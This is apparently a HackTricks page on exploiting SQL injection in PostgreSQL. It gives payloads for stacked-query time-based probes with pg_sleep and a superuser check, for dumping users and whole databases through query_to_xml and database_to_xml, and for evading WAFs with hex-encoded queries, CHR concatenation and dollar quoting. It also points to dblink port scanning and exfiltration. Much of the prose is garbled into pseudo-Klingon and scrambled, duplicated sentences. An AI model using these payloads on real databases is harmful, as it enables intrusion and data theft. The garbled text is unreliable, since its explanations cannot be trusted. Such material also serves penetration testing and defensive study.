| .. | ||
| big-binary-files-upload-postgresql.md | ||
| dblink-lo_import-data-exfiltration.md | ||
| network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md | ||
| pl-pgsql-password-bruteforce.md | ||
| rce-with-postgresql-extensions.md | ||
| rce-with-postgresql-languages.md | ||
| README.md | ||
PostgreSQL injection
htARTE (HackTricks AWS Red Team Expert) tlhIngan Hol!
HackTricks vItlhutlh:
- HackTricks vItlhutlh tlhIngan Hol company advertised want download HackTricks PDF SUBSCRIPTION PLANS Check!
- official PEASS & HackTricks swag Get
- The PEASS Family Discover, NFTs collection exclusive our
- Join the 💬 Discord group telegram group tIq follow Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.
Bug bounty tip: Intigriti sign up bug bounty platform created by hackers, for hackers! https://go.intigriti.com/hacktricks Join today, bounties $100,000 up earning start!
{% embed url="https://go.intigriti.com/hacktricks" %}
This page aims to explain different tricks that could help you to exploit a SQLinjection found in a postgresql database and to compliment the tricks you can find on https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md
Network Interaction - Privilege Escalation, Port Scanner, NTLM challenge response disclosure & Exfiltration
The PostgreSQL module dblink offers capabilities for connecting to other PostgreSQL instances and executing TCP connections. These features, combined with the COPY FROM functionality, enable actions like privilege escalation, port scanning, and NTLM challenge response capture. For detailed methods on executing these attacks check how to perform these attacks.
Exfiltration example using dblink and large objects
You can read this example to see a CTF example of how to load data inside large objects and then exfiltrate the content of large objects inside the username of the function dblink_connect.
PostgreSQL Attacks: Read/write, RCE, privesc
Check how to compromise the host and escalate privileges from PostgreSQL in:
{% content-ref url="../../../network-services-pentesting/pentesting-postgresql.md" %} pentesting-postgresql.md {% endcontent-ref %}
WAF bypass
PostgreSQL String functions
Manipulating strings could help you to bypass WAFs or other restrictions.
In this page you can find some useful Strings functions.
Stacked Queries
Remember that postgresql support stacked queries, but several application will throw an error if 2 responses are returned when expecting just 1. But, you can still abuse the stacked queries via Time injection:
id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -
XML qoH
query_to_xml
DaghajDI' xml format Daq jImej. vaj xml format Daq jImej 1 row vItlhutlh:
SELECT query_to_xml('select * from pg_user',true,true,'');
database_to_xml
tlhIngan Hol:
ghItlh_database_to_xml
vItlhutlh: qaStaHvIS xml format vItlhutlh database vItlhutlh 1 row (qaStaHvIS vItlhutlh database vItlhutlh vItlhutlh DoS vItlhutlh 'ej vItlhutlh vItlhutlh client):
SELECT database_to_xml(true,true,'');
Hex tlhIngan
'ejyo' 'string' 'inside a string' 'queries' 'convert_from' 'bypass filters' 'hex' 'pass the string as hex' 'query_to_xml' 'function' 'run queries' 'Strings in Hex'
{% code overflow="wrap" %}
select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');
# Bypass via stacked queries + error based + query_to_xml with hex
;select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,'')-- -h
# Bypass via boolean + error based + query_to_xml with hex
1 or '1' = (query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,''))::text-- -
{% endcode %}
qoH quotes
vaj quotes vaj vItlhutlhlaHbe'chugh vaj payload 'ej 'oH 'ej CHR vaj bypass vaj (character concatenation only works for basic queries such as SELECT, INSERT, DELETE, etc. It does not work for all SQL statements):
SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
Or with $. This queries return the same results:
Or with $. vItlhutlh vItlhutlh:
SELECT 'hacktricks';
SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;
Bug bounty tip: Intigriti qo' sign up Intigriti, hackers ghaH, hackers ghaH bug bounty platform premium! Intigriti https://go.intigriti.com/hacktricks join today, bounties $100,000 earning!
{% embed url="https://go.intigriti.com/hacktricks" %}
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.